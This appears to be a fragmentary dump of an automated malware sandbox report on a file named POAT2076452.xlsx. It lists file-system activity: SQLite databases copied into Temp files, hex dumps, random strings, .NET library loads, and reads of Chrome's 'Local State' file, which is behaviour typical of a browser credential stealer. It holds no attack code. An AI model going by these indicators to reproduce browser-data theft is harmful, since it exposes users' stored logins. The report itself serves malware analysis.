0 28672 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 09 00 00 00 07 00 00 00 07 00 00 00 02 00 00 00 0d 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 43 fd 0d 0d 2e 00 04 0c fd 00 0f 67 0f fd 0d 4e 0c fd 0c fd 0c fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW


0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW






C:\Users\user\AppData\Local\Temp\tmp72BF.tmp





C:\Users\user\AppData\Local\Temp\tmp738B.tmp











C:\Users\user\AppData\Local\Temp\tmp764C.tmp





C:\Users\user\AppData\Local\Temp\tmp790D.tmp



C:\Users\user\AppData\Local\Temp\tmp79D9.tmp





C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp



C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp

0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 fd 00 02 02 00 40 20 20 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 09 28 0d 7f fd 00 03 7d fd 00 7e 1d 7f fd 7d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp

0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 fd 00 02 02 00 40 20 20 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 09 28 0d 7f fd 00 03 7d fd 00 7e 1d 7f fd 7d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp533A.tmp

0 1026 41 49 58 41 43 56 59 42 53 42 43 5a 44 4a 4d 5a 55 44 56 4e 45 43 4d 46 53 47 4a 53 41 4f 41 49 58 43 4a 46 44 50 48 51 4a 56 55 41 4e 55 46 46 50 51 58 56 59 4a 52 55 47 59 50 4a 47 4b 45 4a 4e 58 43 42 54 58 41 52 41 45 54 41 4b 46 54 4a 4b 56 4c 49 5a 45 58 4c 4d 4f 41 50 56 45 5a 52 5a 5a 55 49 52 44 55 4b 53 50 5a 52 42 50 49 4e 4e 45 4b 4c 43 4c 58 42 48 46 5a 4d 42 52 4a 54 55 4a 5a 54 52 43 47 51 47 46 52 51 43 45 56 50 55 42 41 41 50 42 48 42 54 59 59 48 44 4a 5a 48 48 50 4d 46 41 4b 58 56 4a 50 51 52 51 43 52 55 46 59 50 4d 4e 55 43 52 52 51 4f 59 58 59 45 48 58 51 45 48 57 48 46 4c 5a 53 42 4d 4c 52 52 5a 46 4c 4c 59 55 51 4c 41 44 54 4b 45 44 58 56 44 4c 4b 4c 50 5a 54 54 43 4e 41 58 4d 58 50 53 54 43 48 51 4b 57 4d 53 52 50 4e 52 5a 47 55 4c

AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL

success or wait 1 3E6803 CopyFileW




0 1026 4e 48 50 4b 49 5a 55 55 53 47 45 52 51 53 4c 42 47 53 45 41 56 58 47 4e 44 57 58 4e 48 52 49 4d 47 4b 51 5a 49 59 47 4d 4e 41 4b 4c 44 53 44 4c 4d 5a 54 53 48 57 4e 51 53 4d 52 4c 54 4f 58 4b 49 51 56 5a 57 50 54 50 4d 59 47 43 43 43 54 4f 51 4d 4f 46 47 50 59 56 56 43 43 55 44 4f 52 49 58 4d 4d 58 44 48 4b 43 45 54 55 4c 42 48 4c 4a 45 4e 41 42 45 49 4a 50 54 46 4f 48 46 50 49 55 55 53 46 50 55 48 53 42 48 45 4e 44 41 4e 46 4d 4f 59 5a 52 5a 41 58 59 56 46 45 5a 49 4b 44 4b 55 45 56 5a 41 57 45 46 4b 52 54 55 4a 5a 50 46 55 44 4d 45 5a 5a 51 56 42 47 59 4d 4d 49 48 4b 45 42 59 4a 4d 4a 4d 54 54 58 53 44 54 44 51 41 55 41 54 58 4c 41 42 4c 42 45 4a 55 42 42 50 53 58 5a 50 58 4d 48 56 4e 48 4f 48 59 50 4b 43 59 4c 44 56 47 4a 53 42 50 45 58 57 47 59 56 50

NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP


C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp

0 1026 41 49 58 41 43 56 59 42 53 42 43 5a 44 4a 4d 5a 55 44 56 4e 45 43 4d 46 53 47 4a 53 41 4f 41 49 58 43 4a 46 44 50 48 51 4a 56 55 41 4e 55 46 46 50 51 58 56 59 4a 52 55 47 59 50 4a 47 4b 45 4a 4e 58 43 42 54 58 41 52 41 45 54 41 4b 46 54 4a 4b 56 4c 49 5a 45 58 4c 4d 4f 41 50 56 45 5a 52 5a 5a 55 49 52 44 55 4b 53 50 5a 52 42 50 49 4e 4e 45 4b 4c 43 4c 58 42 48 46 5a 4d 42 52 4a 54 55 4a 5a 54 52 43 47 51 47 46 52 51 43 45 56 50 55 42 41 41 50 42 48 42 54 59 59 48 44 4a 5a 48 48 50 4d 46 41 4b 58 56 4a 50 51 52 51 43 52 55 46 59 50 4d 4e 55 43 52 52 51 4f 59 58 59 45 48 58 51 45 48 57 48 46 4c 5a 53 42 4d 4c 52 52 5a 46 4c 4c 59 55 51 4c 41 44 54 4b 45 44 58 56 44 4c 4b 4c 50 5a 54 54 43 4e 41 58 4d 58 50 53 54 43 48 51 4b 57 4d 53 52 50 4e 52 5a 47 55 4c

AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL




C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp

0 1026 4e 48 50 4b 49 5a 55 55 53 47 45 52 51 53 4c 42 47 53 45 41 56 58 47 4e 44 57 58 4e 48 52 49 4d 47 4b 51 5a 49 59 47 4d 4e 41 4b 4c 44 53 44 4c 4d 5a 54 53 48 57 4e 51 53 4d 52 4c 54 4f 58 4b 49 51 56 5a 57 50 54 50 4d 59 47 43 43 43 54 4f 51 4d 4f 46 47 50 59 56 56 43 43 55 44 4f 52 49 58 4d 4d 58 44 48 4b 43 45 54 55 4c 42 48 4c 4a 45 4e 41 42 45 49 4a 50 54 46 4f 48 46 50 49 55 55 53 46 50 55 48 53 42 48 45 4e 44 41 4e 46 4d 4f 59 5a 52 5a 41 58 59 56 46 45 5a 49 4b 44 4b 55 45 56 5a 41 57 45 46 4b 52 54 55 4a 5a 50 46 55 44 4d 45 5a 5a 51 56 42 47 59 4d 4d 49 48 4b 45 42 59 4a 4d 4a 4d 54 54 58 53 44 54 44 51 41 55 41 54 58 4c 41 42 4c 42 45 4a 55 42 42 50 53 58 5a 50 58 4d 48 56 4e 48 4f 48 59 50 4b 43 59 4c 44 56 47 4a 53 42 50 45 58 57 47 59 56 50

NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP






C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux


C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D51A1A4 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\aac4a7fee37b96c05eb0862217745fc1\System.ServiceModel.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\9b0d0cb232dec8e57df49678532cb923\System.Runtime.Serialization.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\cde471ea4f02c36c73581ed5681e463e\SMDiagnostics.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\1348a5d04b41c614e48fe5fdb88d1cfa\System.ServiceModel.Internals.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux


C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5faf546a8e018d89b1c277e0be243e4b\System.Net.Http.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\97cbf6eb6477005cffa6992126db856c\System.Web.Extensions.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web\9e5950923286f171d1649a05bdc62830\System.Web.ni.dll.aux


C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile


C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile


C:\Users\user\AppData\Local\Temp\tmp62EE.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp64E3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile

File Read


C:\Users\user\AppData\Local\Temp\tmp67A3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile



C:\Users\user\AppData\Local\Temp\tmp6C85.tmp unknown 28672 success or wait 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Security\754ca70e68140abcdb8476cff64c4169\System.Security.ni.dll.aux




C:\Users\user\AppData\Local\Temp\tmp71C5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp738B.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp7551.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile



C:\Users\user\AppData\Local\Temp\tmp7718.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp790D.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp unknown 524288 success or wait 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\98d3949f9ba1a384939805aa5e47e933\System.Management.ni.dll.aux


C:\Users\user\AppData\Local\Temp\tmp533A.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp3E26.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\849e4f93d41f8b6645878090ee9a7505\Microsoft.CSharp.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\81f3dddd8aa6172d72bf5f1161e6fd01\System.Dynamic.ni.dll.aux



⊘ No disassembly

Disassembly


Automated Malware Analysis Report for POAT2076452.xlsx ...

Documents

Transcript of Automated Malware Analysis Report for POAT2076452.xlsx ...